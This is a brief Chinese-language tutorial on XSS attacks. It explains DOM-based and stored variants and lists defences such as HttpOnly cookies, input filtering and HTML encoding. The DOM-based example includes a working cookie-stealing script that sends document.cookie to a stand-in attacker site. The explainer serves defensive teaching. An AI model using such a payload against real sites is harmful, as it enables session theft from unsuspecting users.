XSS跨站脚本攻击

　　XSS跨站脚本攻击

　　解释：就是攻击者在页面嵌入js代码，盗取被攻击者同浏览器下的cookie信息，跳转到恶意网站，注入木马等，常见的有两种方式：

　　《1》Dom-Based XSS 漏洞；

　　　　攻击者A先创建一个http://www.a.com网站，用来接收数据，然后给被攻击者B发送一条链接http://www.b.com?a=<script>window.open("http://www.a.com?cookie="+document.cookie)</script>,B用户访问了这条链接后，浏览器的cookie将传送给攻击者，从而盗取到用户的cookie；

　　《2》Stored XSS(存储式XSS漏洞)；

　　　　攻击者将攻击脚本上传到web服务器上，用户访问网站时盗取浏览器cookie；如用户在web网站创建一边文章加入了攻击脚本；

　　防范措施：

　　《1》将重要的cookie标记为http only ,js中的document.cookie就获取不到cookie；

　　《2》用户输入的数据进行过滤；

　　《3》对数据进行html encode处理；如将“<”转化为&lt;

　　《4》过滤或处理特殊的html标签；如script;